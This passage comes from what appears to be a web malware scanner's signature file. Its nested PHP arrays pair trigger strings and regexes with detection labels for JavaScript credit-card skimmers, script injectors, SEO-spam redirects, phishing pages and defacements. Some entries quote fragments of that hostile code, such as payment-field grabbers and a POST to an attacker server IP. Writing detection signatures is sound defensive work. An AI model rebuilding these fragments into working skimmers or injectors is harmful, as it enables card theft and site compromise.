			'scripts["\x6C\x65\x6E\x67\x74\x68"];i++){if(scripts[i]["\x69\x64"]==' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.redirect.042', 'var ([\w]+)[\s]*=[\s]*function\(\)[\s]*\{[\s]*var _0x[\w]+[\s]*=[\s]*String\[[^\]]+\]\([\d]+,[\s]*[\d]+[^;]+;[\s]*var _0x[\w]+[\s]*=[\s]*document\[..x[^}]+\};[\s]*var[\s]*scripts[\s]*=[\s]*document\[..x[^}]+\}};[\s]*if[^\)]+\)[\s]*\{\1\(\)[\s]*\}'),
			'throw\'\x45\x72\'+\'\x72\x6f\'+\'\x72\x20\'+\'\x69\x6e\'+\'\x20\x70' => array(STR_CLEAR_LINEMATCH, 'js.malware.generic.043', '\w+=(\'.x\d+.x\d+\'\+){1,3}\'.x\w+.x\w+\';\w+=(\'.x\w+.x\w+\'\+){1,15}\'.x\w+.x\w+\';[^[]*\[\w\]=String\[(\'.x\w+.x\w+\'\+){1,5}\'.x\w+.x\w+\'\]\(\w\);let.\w=\w\[\dx\d\],\w[^S]*Storage\[\w+\]\)\);if\(localStorage\[\w+\]\)\w+\(\);else.fetch\(\w+\)\[\'.[^S]*Storage\[\w+\]=\w;\w+\(\);\}\);\}\);'),
		),

		'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=' => array(STR_TRIGGER,

			']===undefined){(function(){let _0x' => array(STR_TRIGGER,
				';try{const _0x' => array(STR_TRIGGER,
					'=window;}const _0x' => array(STR_TRIGGER,
						'RR[' => array(STR_CLEAR_LINEMATCH, 'js.malware.cc_stealer.007', 'const [\w]+[\s]*=[\s]*\[[^\]]+\];[\s]*\(function\([\w]+,[\s]*[\w]+\)[\s]*\{[\s]*const [\w]+[\s]*=[\s]*function[^\}]+shift.\]\(\)\);[\}\s]+;[^\n]+[\w]+\[[\w]+\([^\)]+\)\][\s]*=[\s]*[\w]+\([^\)]+\);[\s]*(void [\w]+;)?'),
					),
				),
			),

			'),\'id\',\'cdn' => array(STR_TRIGGER,
				'getElementsByTagName\',\'insertBefore\',' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.redirect.041.10', 'var[\s]*[\w]+=\[[^\]]{800}[^\]]+\];[\s]*\(function\([\w]+,[\w]+\)[\s]*\{[\s]*(var[^!]+!!\[\];[\s]*\}[\s]*)+[^}]+}[\s]*else[\s]*\{[^\{]+\(\)\{var[^!]+!!\[\];[^\}]+;\}\(\)\);'),
			),
		),

		'typeof jQuery' => array(STR_TRIGGER,
			'document[_' => array(STR_TRIGGER,
				'window[_' => array(STR_TRIGGER,

					'String[\'fromCharCode\']' => array(STR_TRIGGER,
						'XMLHttpRequest:XDomainRequest' => array(STR_CLEAR_MULTIMATCH, 'js.malware.redirect.017', 'var\s*(\w+)=\[[\'"][^;]+;\s*\(function\((\w+),\w+\)\s*{\s*var\s*\w+=function\((\w+)\)\s*{\s*while\(--\3\)\s*{\2\[.\w+.\]\s*\(\2\[.\w+.\][^\2]+XMLHttpRequest:XDomainRequest;var\s*\w+=\s*new\s*\w+\(\)\s*;\s*}\s*var\s*(\w+)=\!\[\]\s*;\s*var\s*[^\2]+null\)\s*\4=\!\!\[\]\s*;\s*}\s*\)\s*;if\s*\(\4==\!\!\s*\[\]\s*\)\s*{\s*\w+\(\)\s*;\s*\4=\!\[\]\s*;}},\w+\);\s*}\s*;')
					),

					'var sss' => array(STR_CLEAR_MULTIMATCH, 'js.malware.redirect.012', '(?:const\s*\w+\s*=\s*\'.[^\']+\'\s*;\s*)+\s*function\s*\w+\(\)\s*{\s*const\s*\w+\s*=\s*_\w+;\s*\w+\s*_\w+\s*=\s*_\w+\s*;\s*const\s*_\w+\s*=\s*+_\w+\s*;\s*var\s*\w+\s*=\s*document\[(?:_\w+\[\d+\]\s*\+\s*)+[^;]+;[^\)]+\)\s*[^\)]+\)[^j]+jQ[^{]+{\s*(?:jQuery|const)[^{]+{\s*(?:const\s*_\w+\s*=\s*+\w+;\s*const\s*_\w+\s*=\s*+_\w+\s*;\s*const\s*_\w+\s*=\s*_\w+\s*;\s*\w+\(\);\s*})?[^{]+{\s*(window|const)[^}]+}(?:;)?\s*}\s*;'),
					'encData= encryptData(b);jQuery[' => array(STR_CLEAR_MULTIMATCH, 'js.malware.cc_stealer.013', 'var\s\w+.\w+=\(function\(\w,\w\)\s+\{\s+var\s\w=\w\.length;\s+var\s\w=\[\];\s+for\(var\s\w=\d;\w<\s\w;\w\+\+\)\s+\{\s+\w\[\w\]=\s\w\.charAt\(\w\)\s+\}[^S]*String\.fromCharCode\(\d+\);[^\}]*\}\s+\)\(\"\w+\[\w+=\w+[^\n]*\d+\);\s+(var\s\w+=_\$[^[]*\[\d\];\/\/\d\s+){1,10}\(function\(\)\s+\{\s+\w+.\w+\[\d+\]([^I]*Interval\(function\(\)\s+\{){1,3}\s+if.document\[[^U]*URIComponent\(\w\[\d\]\):undefined\s+\}[^R]*RegExp\([^\(]*\(window\[[^Q]*Query\([^:]*:\w+=\sjQuery\([^E]*Email:\w+\[[^D]*Date:\w+\[[^J]*JSON\[[^U]*URIComponent\(\w\[\d\]\):undefined\s+\}\s+function\s\w+\(\w,\w\)\s+[^R]*RegExp[^B]*Base64\[[^N]*NaN\(\w\)[^:]*:function\(\w\)[^:]*:function\(\w\)[^:]*:function\(\w\)\s+\{\s+var\s\w[^}]*\}\s+else[^S]*String\[[^u]*urn\s\w\s+\}\s+\}'),
				),
			),
		),

		'=\s*\'\';\s*for\s*\(' => array(REX_TRIGGER,
			'](0)^' => array(STR_CLEARFILE, 'js.spam-seo.redirect.016', NULL),
			'73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.injector.059', '<script type="text.javascript">\s*\w = .73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174[^>]+document\[.write.]\([^%]+[%<\diframesc]+[^<]+[%<>\diframesc]+.\)\);\s*<.script>'),
		),

		'var a0a=[' => array(STR_TRIGGER,
			')+a0b(\'0x6' => array(STR_CLEAR_LINEMATCH, 'js.malware.obfuscated.003', 'var a0a[\s]*=[\s]*\[[^;]+\];[\s]*\(function\(a,[\s]*b\)\{[^\n]+a0.\);[\s]*(numInterval[\s]*=[\s]*setInterval\(function[^\}]+[\}\s]+,0x[\w]+\);[\s]*\}[\s]*)?'),
		),

		'":/mobile|ip(hone|od|ad)|android|blackberry|iemobile|kindle' => array(STR_CLEAR_LINEMATCH, 'js.malware.unwanted-ads.004', 'function[^{]+{function\s*\w+\(\){if[^\]]+\]\)return[^\.]+\.length;\s*try[^\]]+\]\(document\[\((\(function|String\.fromCharCode)\s*\([^\]]+\][^\|]+\|\|document\[\((\(function|String\.fromCharCode)[^\|]+\|\|{};\s*var[^@]+:\/mobile\|ip\(hone\|od\|ad\)\|android[^{]+{\s*var[^\?]+\?\(\w+\[\(String\.fromCharCode[^\)]+\)\)\][^}]+}[^}]+}[^@]+\.length\}\)\;\s*\/\/\s*menu_potos'),
		'createElement\',\'script\',\'onload\',\'src\',\'http' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.injector.068', 'var\s*_0x\w+\s*=\s*\[[(createElementscriptonload\'",)]+https?:\/\/[^\]]+\]\s*;\s*\(\s*function\s*\(_0x\w+\s*,\s*_0x\w+\s*\)\s*{\s*var\s*_0x\w+\s*=\s*function\s*\(_0x[^{]+{\s*while\s*\([^\2]+script\[.type.\]\s*=\s*(_0x\w+)\(.\w+.\)\s*;\s*document\[\1\(.\w+.\)\s*\]\s*\(\1\(.\w+.\)\s*\)\s*\[\w+\]\s*\[\1\(.\w+.\)\s*\]\s*\(script\)\s*;'),
	),

	'document.getElement' => array(STR_TRIGGER,

		'document.getElementsByTagName' => array(STR_TRIGGER,

			'script=document.createElement(' => array(STR_TRIGGER,
				'Y2hlY2tvdXQ=' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.060', 'if[\s]*\(window.location.href.indexOf[\s]*\([\s]*window.atob\(.Y2hlY2tvdXQ=.\)\)>-[\d]+\)[\s]*\{[\s]*var[\s]*script[\s]*=[\s]*document.createElement\(.script.\);[\s]*script.src[\s]*=[\s]*.http[^\)]+\);[\s]*document.getElementsByTagName\(.head.\)\[[\d]*\].appendChild\(script\);[\s]*\}'),
				'poponclick' => array(STR_CLEAR_MULTIMATCH, 'js.malware.injector.070', 'var[\s]*script=document.createElement\(.script.\);script.onload=function\(\)[\s]*\{\},script.src=.https?:..poponclick[^,]+,document.getElementsByTagName\(.head.\)\[[\d]+\]\.appendChild\(script\);'),
				'ocument.createElement("script");script.onload=function(){},script.src="' => array(STR_CLEAR_LINEMATCH, 'js.malware.unwanted-ads.017', 'var.script=document.createElement\(\"script\"\);script.onload=function\(\)\{\},script.src=\"http(s|):\/\/(\w+\.){1,3}(\w+\/){1,4}\w+\.\w+",document.getElementsByTagName\("head"\)\[0\].appendChild\(script\);'),
			),

			'hm = document.createElement("script");' => array(STR_TRIGGER,

				'allowtransparency=' => array(STR_TRIGGER,
					'_hmt = _hmt || [];' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.hidden-iframe.009', '<script>(?:[^;]+?;\s*?document\.write[^<]+?<["\'iframe\+ ]{12,}[^>]+?.src[^>]+?\?ref=[^<]+?<\/["\'iframe\+ ]{10,})?[^_]+?_hmt = _hmt \|\| \[\];\s*?\(function\(\)\s*?\{\s*?(?:var)?\s*?hm = document.createElement..script[^<]+?<\/script>'),
				),
				
				'|google|' => array(STR_TRIGGER,
					'var where = document.referrer;' => array(STR_CLEARFILE, 'php.malware.redirect.023', NULL),
				),
			),

			'\x68\x74\x74\x70\x3A\x2F\x2F' => array(STR_TRIGGER,         
				'.setAttribute("type","text/javascript");var' => array(STR_CLEAR_LINEMATCH, 'js.malware.iframe_injector.007', 'var\s*\w+\s*=\s*document\.createElement\([\'"]\w+[\'"]\)\s*;\s*\w+\.setAttribute\([\'"]type[\'"],[\'"]text\/javascript[\'"]\)\s*;\s*var\s*\w+\s*=\s*\[[\'"].x68.x74.x74.x70.x3A.x2F.x2F[^\]]+\]\s*;\s*var\s*\w+=\s*\w+\[\d\]\+Math\[\w+\[\d\]\]\(\);\s*\w+\.setAttribute\([\'"]src[\'"],\w+\)\s*;\s*if\s*\(typeof\s*\w+\!=\s*[\'"]undefined[\'"]\)\s*;\s*document\.getElementsByTagName\([\'"]\w+[\'"]\)\[\d\]\.appendChild\(\w+\);'),
				'\x67\x65\x74\x73\x70\x61\x6D\x74\x6F\x6F\x6C\x2E\x63\x6F\x6D' => array(STR_CLEARFILE, 'php.hacktool.mailer_gen.003', NULL), 
			),

			'document.createElement(\'script\');' => array(STR_TRIGGER,
				'popads.net' => array(STR_TRIGGER,
					'document.getElementsByTagName(\'script\')[0];' => array(STR_CLEAR_MULTIMATCH, 'js.malware.popads.002', 'var[\s]*[\w]+[\s]*=[\s]*[\w]+[\s]*\|\|[\s]*\[\];[\s]*[\w]+\.push\(\[.[\w]+.,[\s]*[\d]+\]\);[^\{]+\{[\s]*var[\s]*[\w]+[\s]*=[\s]*document.createElement\(.[\w]+.\);[\s]*[\w]+\.type[\s]*=[^\{]+document.getElementsByTagName\(.script.\)\[[\d]+\];[^\}]+parentNode.insertBefore\([\w]+,[\s]*[\w]+\);[\s]*\};[\s]*[\w]+\.parentNode\.insertBefore\([\w]+,[\s]*[\w]+\);[\s]*\}[\s]*\)[\s]*\([\s]*\);'),
				),
			),

			'\'cc_cvv\';' => array(STR_TRIGGER,
				'encode : function (input) {' => array(STR_TRIGGER,
					'var checkStatus = "";' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.101', 'var [\w]+[\s]*=[\s]*\[.dev.,[\s]*.qa.,[\s]*.stg.,[\s]*.local[^\]]+\];[\s]*var [\w]+[\s]*=[^\{]+var [\w]+[\s]*=[\s]*\{[\s]*_keyStr[\s]*:[^\x02]+\}[\s]*setTimeout\([\w]+,[\s]*[\d]+\);'),
				),
			),

			'getElementsByTagName(\'bo\' + sz)[0]' => array(STR_TRIGGER,
				'scro\' + \'lling="yes" style="overflow-x:hidden" src="\' + thisur' => array(STR_CLEARFILE, 'js.spam-seo.injector.038', NULL),
			),

			'gcse.type' => array(STR_TRIGGER,
				'main1.js' => array(STR_CLEAR_MULTIMATCH, 'js.malware.fakegcse.001', '<script>[^>]+gcse\s*=\s*document.createElement..script..;\s*gcse.type[^>]+gcse.src\s*\=\s*.http[^;]+main1.js[^>]+insertBefore.gcse[^<]+<.script>'),
			),

			'gcse.src = (document.location.protocol' => array(STR_TRIGGER,
				'X.open("POST", \'http://\' + SERVER_IP + \':\' + SERVER_PORT +' => array(STR_CLEARFILE, 'js.malware.fakegcse.002', NULL),
			),

			'b=document.getElementsByTagName("script")[0];b.parentNode.insertBefore(a,b);})();' => array(STR_TRIGGER,
				'script type="text/javascript">(function(){var a=document.createElement("script");a.type="text/javascript";a.async' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.injector.034', '<script type="text.javascript">\(function\(\)\{var a=document.createElement."script[^<]+document.getElementsByTagName..script..\[[\d]*\];b.parentNode.insertBefore.a,b\);}\)\(\);<.script>'),
			),

			'ByTagName("bo"+"dy")[0]).appendChild(a);' => array(STR_TRIGGER,
				'+ Math.floor(Math.random()*9999) + ".js?"' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.injector.036', 'function createCookie\\([\\w],[\\s]*[\\w],[\\s]*[\\w]\\)[\\s]*\\{[^}]+\\}[\\s]*function getCookie[^!]+function\\(\\)\\{[\\s]*if[\\s]*\\(getCookie[^{]+\\{[\\s]*createCookie[^}]+Math.floor\\(Math.random[^}]+bo"\\+"dy"......appendChild\\([\\w]\\);[\\s]*}[\\s]*}[\\s]*\\)\\(\\);'),
			),

			'document.getElementsByTagName("body")[0].appendChild(' => array(STR_TRIGGER,
				'link_site' => array(STR_CLEAR_MULTIMATCH, 'js.malware.injector.038', 'var\s*\w+\s*=\s*\[.h.,\s*.t.\s*,\s*.t.,\s*.p.,[^\]]+\];\s*var\s*link_site\s*=\s*site.join\(..\)\;\s*function\s*\w+\(\)\s*\{\s*function\s*JS_LoadJS\(filename\)\s*\{\s*var\s*\w+\s*=\s*document\.createElement\(.script.\)\s*\w+\.setAttribute\(.type.,\s*.text.javascript.\)\s*\w+\.setAttribute\(.src.,\s*filename\)\s*if\s*\(typeof\s*\w+\s*\!=\s*.undefined.\)\s*document\.getElementsByTagName[^\}]+\}\s*\w+\(link_site\)[^}]+\}\s*if\s*\(window.addEventListener\)\s*\{\s*window.addEventListener\([^\)]+\);\s*\}\s*else\s*if\s*\(window.attachEvent\)\s*\{[^\}]+\s}\s*else\s*if\s*\(window\.onLoad\)\s*\{\s*window\.onload\s*=\s*\w+;\s*\}'),
			),

			'.js\';var s=document.getElementsByTagName(\'script\')[0];s.parentNode.insertBefore(st,s)})();' => array(STR_TRIGGER,
				'(function(){var st=document.createElement(\'script\');st.type=\'text/javascript\';st.async=true;st.charset=\'utf-8\';st.src=' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.injector.067', '\(function\(\)\{var st=document\.createElement\(.script.\);st\.type=.text.javascript.;st.async=true;st.charset=.utf-8[^\}]+parentNode\.insertBefore\(st.s\)\}\)\(\);'),
			),

			'(function(){var i=document.createElement(\'script\');i.type=\'text/javascript\';i.async=true;i.src=atob(' => array(STR_TRIGGER,
				');var s=document.getElementsByTagName(\'script\')[0];s.parentNode.insertBefore(i,s);})();' => array(STR_CLEAR_LINEMATCH, 'js.malware.injector.053', '\(function\(\)\{var \i=document\.createElement\(.script.\);\i\.type[^\(]+=atob\([^;]+\);var s=document\.getElementsByTagName[^\}]+\}\)\(\);'),
			),

			'angularCdn:' => array(STR_TRIGGER,
				'return d},algularToken:' => array(STR_CLEAR_LINEMATCH, 'js.malware.injector.059', 'var Angular=\{load:function\(\)\{var a=document\.createElement..script[^>]+innerWidth>[^"]+"";[^"]+algularToken:[^,]+,[\s]*angularCdn:[^;]+\};[\s]*Angular\.ready\(\);'),
			),

			'atob("c2NyaXB0"));e.src=atob("aHR0cH' => array(STR_TRIGGER,
				'setInterval(function(){if(!window.$sloaded&&!window.devtools.open&&"undefined' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.049.02', '\(function\(\)\{"use strict";var .=\{open:[^\{]+\{window\.dispatchEvent\(new CustomEvent\(.devtoolschange[^\>]+innerWidth[^\}]+\)\}[^\}]+\}\)\(\)[^\}]+src=atob\(.aHR0[^;]+\);'),
			),

			'-ninja.min.js' => array(STR_CLEAR_MULTIMATCH, 'js.malware.injector.047', '\(function\(\)\{var\s*i=document\.createElement\(.script.\);i\.type=.text.javascript.;i\.async=true;\i.src=...[^\.]+\.im[^-]+-ninja\.min\.js.;var\s*\w=document\.getElementsByTagName\(.script.\)\[\d\];\s*\w\.parentNode\.insertBefore\(i\,\w\);\}\)\(\);'),
			'vmsg.onclick = function(){load2();};}window.onload=checkCount;' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.redirect.022', 'var expDays = \\d[^;]+;function GetCookie[^[]+var expires = .argc[^}]+}[\\s]*function DeleteCookie[^:]+var ur_h=.http:[^}]+show=1;}}[^}]+load2..;};}window.onload=checkCount;'),
			'Muhamad Irhash Syn\'s <' => array(STR_CLEARFILE, 'html.defaced.generic.121', NULL),
			'var page = new Array(howMany' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.redirect.035', 'setTimeout\(function\(\)\s*\{\s*var\s*(howMany)\s*=\s*\d+;\s*var\s*page\s*=\s*new\s*Array\(\1[^;]+;\s*page\[\d\]=.http[^\(]+\(\)\{\s*var\s*(randscript)\s*=[^;]+;\s*while\s*\(\2\s*<\s*\d\s*\|\|\s*\2\s*>\s*\1[^\{]+\{\s*\2\s*[^\*]+\*\(\1[^\}]+}\s*return\s*\2;\s*\}\s*[^\{]+\{[^\'"]+.-webkit-[^\]]+\];[^\']+.transform.\s*in\s*document[^\}]+\}\s*\}\s*\}\)\(\);'),
			'(function() { var wc = document.createElement(\'script\');wc.type' => array(STR_CLEAR_MULTIMATCH, 'js.malware.unwanted-ads.003', '\(function\(\)\s*\{\s*var\s*wc\s*\=\s*document.createElement\(.script.\);wc.type\s*\=\s*.text.javascript.;wc.src[^\}]+\}\)\(\);[^>]+>\-\d\|\|window[^"]+"function"\!=typeof[^>]+>\w;\w\+\+\)[^>]+>.,.<div\s*class[^;]+;\w&&this.set[^\!]+\!\d;\w.onload=\w.bind\(function[^"]+"head"[^"]+"yes"[^"]+"complete"[^"]+"readystatechange",\w\)\}\}\}\(\);'),
			'//assetsbraln.com/cv5/tasking.js' => array(STR_CLEAR_MULTIMATCH, 'js.malware.injector.045', '<script\s*type=.text\/javascript.>\s*var\s*\w+\s*=\s*document\.createElement\(.\w+.\)\s*;\s*\w+\.type\s*=\s*.text\/javascript.\s*;\s*\w+\.async\s*=\s*true;\s*\w+\.src\s*=[^;]+;\s*var\s*\w+\s*=\s*document\.getElementsByTagName\(.\w+.\)\s*\[\d\]\s*;\s*\w+\.parentNode\.insertBefore\(\w+,\s*\w+\);\s*<\/script>'),
			'{var p=document.createElement(\'script\');p.type=\'text/javascript\';p.async=true;p.src=g(\'' => array(STR_CLEAR_MULTIMATCH, 'js.malware.injector.046', ';\(function\(\){\s*var\s*\w+\s*=\s*navigator\[[^\]]+\]\s*;var\s*\w+\s*=\s*document\[\w+[^\]]+]\s*;\s*if\([^{]+{.\)\)&&\![^{]+{\s*if\(\!\w+[^;]+;\w+\([^{]+{\s*var\s*\w+\s*=\s*document\.createElement\(.script.\)\s*;\w+\.type\s*=\s*.text\/javascript.;\s*\w+\.async\s*=\s*true\s*;\s*\w+\.src=\w+\(\'[^\']+\'\);\s*var\s*\w+\s*=\s*document\.getElementsByTagName\(.script.\)\[\d+\];\w+\.parentNode\.insertBefore\(\w,\w\);}}\s*function\s*\w+\(\w\){var\s*\w+=\s*..;\s*for\(var\s*\w+\s*=\d;[^{]+{if\([^{]+{\s*if\(\w+[^}]+}else\{return\s*false;}}function\s*\w\(\w\){var\s*\w=..;\s*for\(var\s*\w\s*=\s*\w\.length-\d;\s*i>=\d;\s*i--\){\w\+=\w\[\w\];}return\s*\w;}}\)\(\);'),
			'split("").reverse().join("");return i;' => array(STR_CLEAR_LINEMATCH, 'js.malware.script_reversed.002', ';\s*\(function\(\)\s*{var\s*(\w)\s*=\s*navigator\.userAgent\s*;\s*if\s*\(\1\.match\(\/windows\/i\)\s*&&\s*\!\1\.match\(\/android\/i\)\)\s*{\s*if\s*\(document\.cookie\.indexOf\s*\([^{]+{\s*var\s*(\w)\s*=\s*document\.createElement\(.script.\)\s*;\s*\2\.type\s*=\s*.text\/javascript.\s*;\s*\2\.async\s*=\s*true\s*;\s*\2\.src\s*=[^;]+;\s*var\s*(\w)\s*=\s*document\.getElementsByTagName\(.script.\)[^}]+}\s*}\s*function[^{]+{\s*var\s*(\w)\s*=\s*\'\'\s*;\s*for\s*\(var\s*(\w)\s*=\s*\d\s*;[^}]+}\4=\4\.split\(..\)\s*\.reverse\(\)\.join\(..\)\s*;\s*return\s*\4\s*;\s*}\s*}\s*\)\s*\(\)\s*;'),
			'\x71\x75\x65\x72\x79\x2E\x63\x6F\x6D\x2F\x63\x6F\x6D\x70\x61\x62\x69\x6C\x69\x74\x79\x2E\x70\x68\x70\x3F' => array(STR_CLEAR_LINEMATCH, 'js.malware.fake_jquery.002', 'var [\w]+[\s]*=[\s]*document\.createElement..script.\);[^[]+\[..x68.x74.x74[^>]+document\.getElementsByTagName\(.head.\)\[[\d]+\]\.appendChild\([^;]+\);'),
			'+btoa(n),document.body.appendChild(a)}window.onload=function(){' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.043', 'function\s*\w+\(\)\s*{\s*Array\.from\(document\.getElementsByTagName\(..\w+..\)\)\.forEach\(function[^\2]+document\.createElement\(..\w+..\)\s*;\s*\w\.width=[^\2]+\w\.src\s*=\s*atob\([^}]+}\s*window\.onload\s*=\s*function\(\)\s*{\s*-?\d+\!=location\.href\.search[^}]+}\s*;'),
			'if(!loadStats){function loadStats(){var' => array(STR_CLEAR_LINEMATCH, 'js.malware.createElement.004', 'if\(!loadStats\)\{function loadStats\(\)\{var [\w]+[\s]*=[\s]*document\.getElementsByTagName\(.head.[^\}]+\}[\s]*loadStats\(\)\};?'),
			'document.write (\'<div style="display:none' => array(STR_CLEAR_MULTIMATCH, 'js.malware.injector.056', 'var\s*(\w+)\s*=\s*document\.createElement\(.script.\)\s*;\s*\1\.src\s*=\s*[\'"]http[^;]+;\s*\(document\.getElementsByTagName\(.head.\)\s*\[\d+\]\s*\|\|\s*document\.body\)\.appendChild\(\1\)\s*;\s*document\.write\s*\([\'"]<div\s*style=[\'"]display:none[^\)]+\)\s*;'),
			'(var [\w]+[\s]*=[\s]*String\.fromCharCode\([^\)]+\);[\s]*){4,}var [\w]+[\s]*=[\s]*document\.createElement\([\w]+\);[\s]*[\w]\.type[^;]+;[\s]*var[\s]*[\w]+[\s]*=[\s]*document\.getElementsByTagName\([^;]+\];[\s]*[\w]+\.parentNode\.insertBefore\([\w],[\s]*[\w]\);' => array(REX_CLEAR_LINEMATCH, 'js.malware.injector_stats.006', '(var [\w]+[\s]*=[\s]*String\.fromCharCode\([^\)]+\);[\s]*){4,}var [\w]+[\s]*=[\s]*document\.createElement\([\w]+\);[\s]*[\w]\.type[^;]+;[\s]*var[\s]*[\w]+[\s]*=[\s]*document\.getElementsByTagName\([^;]+\];[\s]*[\w]+\.parentNode\.insertBefore\([\w],[\s]*[\w]\);'),
			'document.createElement("style");s.type="text/css";var' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.hidden-style.015', 'function[\s]*[\w]+\(\)\{var[\s]*[\w]*=document\.head;if\(![\w]*\)[^\}]+\}[\s]*var[\s]*[\w]*[\s]*=[\s]*document.createElement\(.style.\);[^\<]+appendChild\(document.createTextNode\([\w]*\)\);[\w]*\.appendChild\([\w]*\);\}[\w]+\(\);'),
			'if[\s]*\(![\w]+\)[\s]*\{function[\s]*[\w]+\(\)[\s]*\{[\s]*var[\s]*[\w]+=document.getElementsByTagName\(.head.\)[\s]*\[[\d]+\],[\s]*[\w]+=document.createElement\(.script.\);[^,]+,[\w]+\.src=[^,]+,[\w]+\.async=.async.,[\w]+\.appendChild\([\w]+\)[\s]*\}[\s]*[\w]+\(\)[\s]*\}' => array(REX_CLEAR_LINEMATCH, 'js.malware.injector.068', 'if[\s]*\(![\w]+\)[\s]*\{function[\s]*[\w]+\(\)[\s]*\{[\s]*var[\s]*[\w]+=document.getElementsByTagName\(.head.\)[\s]*\[[\d]+\],[\s]*[\w]+=document.createElement\(.script.\);[^,]+,[\w]+\.src=[^,]+,[\w]+\.async=.async.,[\w]+\.appendChild\([\w]+\)[\s]*\}[\s]*[\w]+\(\)[\s]*\}'),
		),

		'window.location' => array(STR_TRIGGER,

			'if (screen.width <= 480) {' => array(STR_TRIGGER,
				'voluumtrk.com' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.redirect_gen.003.02', '<script[^>]*>\s*if\s*\(screen.width <= 480\)\s*\{\s*window.location\s*=\s*"http:\/\/[^"]+";\s*\}\s*<.script>'),
				'.pw/l.php' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.redirect_gen.003.03', '<script[^>]*>\s*if\s*\(screen.width <= 480\)\s*\{\s*window.location\s*=\s*"http:\/\/[^"]+";\s*\}\s*<.script>'),
			),

			'$.post("login.php", {username:username, pass:pass}, function(data){' => array(STR_CLEARFILE, 'js.phishing.generic.010', NULL),
			'Raiffeisen DirektNet - Internet Banking' => array(STR_CLEARFILE, 'php.phishing.mailer.029.03', 'NULL'),
		),

		'xmlhttp.open("GET",' => array(STR_TRIGGER,
			'="name="+name+"&num="+num+"&mon="+mon+"&yr="+yr+"&cid="+CVN;' => array(STR_CLEARFILE, 'js.malware.magento-cc-stealer.006', NULL),
			'getElementById("billing:customer_password").value;' => array(STR_CLEARFILE, 'js.malware.magento-cc-stealer.007', NULL),
			'_stripe_cc_number").value;' => array(STR_CLEARFILE, 'js.malware.magento-cc-stealer.006.02', NULL, 1),
			'));parent.document.location.href=' => array(STR_CLEAR_MULTIMATCH, 'js.malware.redirect.014', 'function\s*(\w+)\(\s*responsetext\s*\)\s*{\s*var\s*\w+\s*=\s*document\.getElementsByTagName\s*\(.\w+.\)\s*\[\d+\]\s*;\s*var\s*\w+\s*=\s*document\.createElement\(.\w+.\)\s*;\s*\w+\.innerHTML\s*=\s*responsetext\s*;\s*\w+\.appendChild\(\w+\)\s*;\s*}\s*function\s*(\w+)\s*\(\s*theUrl\s*\)\s*{\s*if\s*\(\s*window\.XMLHttpRequest\s*\)\s*{\s*\w+\s*=[^{]+{\s*\w+[^{]+{\s*\1\s*\([^}]+}\s*\w+\.open\s*\(.GET.,\s*theUrl\s*,\s*false\s*\)\s*;\s*\w+\.send\s*\(\s*\)\s*;\s*}\s*document\.write\s*\(\2\s*\(.\/\/[^;]+;\s*document\.write\(\2\s*\(.\/\/[^;]+;\s*parent\.document\.location\.href\s*=\s*.http:\/\/[^\+]+\+document\.getElementById\([^\)]+\)\.value\+[^\+]+\+document\.getElementById\s*\(.\w+.\)\.value'),
		),

		')).innerHTML);' => array(STR_TRIGGER,
			'd3JhcHBlcg==' => array(STR_TRIGGER,
				'Zm9vdGVyX2JvdHRvbV9jb250ZW50' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.injector.075', 'function [\w]+\(\)[\s]*\{[\s]*var[\s]*[\w]+[\s]*=[\s]*new String\(document\.getElementById\([\w]+\.[\w]+\(.Zm9vd[^\}]+innerHTML[\s]*=[\s]*..;[\s\}]*'),
			),
		),

		'window.location' => array(STR_TRIGGER,
			'$.post("login.php", {username:username, pass:pass}, function(data){' => array(STR_CLEARFILE, 'js.phishing.generic.010', NULL),
			'Raiffeisen DirektNet - Internet Banking' => array(STR_CLEARFILE, 'php.phishing.mailer.029.03', 'NULL'),
			'+window.location.search.replace(' => array(STR_CLEAR_MULTIMATCH, 'js.malware.iframe_injector.018', '<div[\s]*id=.([\w]+-?)+.><.div>[\s]*<script[^>]+>[\s]*document.getElementById\(.([\w]+-?)+.\)\.innerHTML[\s]*=[\s]*.<iframe[\s]*sandbox.{10,100}src=[^>]+frame.><.iframe>.[\s]*<.script>'),
		),

		'// Credit Card Validation Javascri' => array(STR_TRIGGER,
			'+encodeURIComponent(b)+"&domain="+dmn);' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.021', 'var (\w+?)\s*?=\s*?false;\s*?function\s*?[^\+]+?\+encodeURIComponent\(b\)\+"&domain="\+dmn\);\s*?}\s*?function\s*?(\w+?)\(\)\s*?{\s*?if\s*?\(\s*?\(!\1\)[^:]+?:firstname[^}]+?(?:}\s*?){4}window\.onload=function[^\w]+?if\(window\.location\.href\.match\("onestepcheckout"\)\)[^\)]+?\);[^\)]+?\);\s*?setInterval\(.\2(?:[^}]+?}\s*?){2}'),
		),

		'form:has([name^=payment])' => array(STR_TRIGGER,
			'document.getElementsByName(\'payment[cc_number]' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.019', 'var ([\w]+)=false;setInterval.function\(\)\{if\(\(!\1\)&&[^)]+payment\[cc_number]....length[^}]+},type:.POST.,dataType:.json.,success[^;]+\);'), //modified by PG to cover variant
		),

		'function bom(){' => array(STR_TRIGGER,
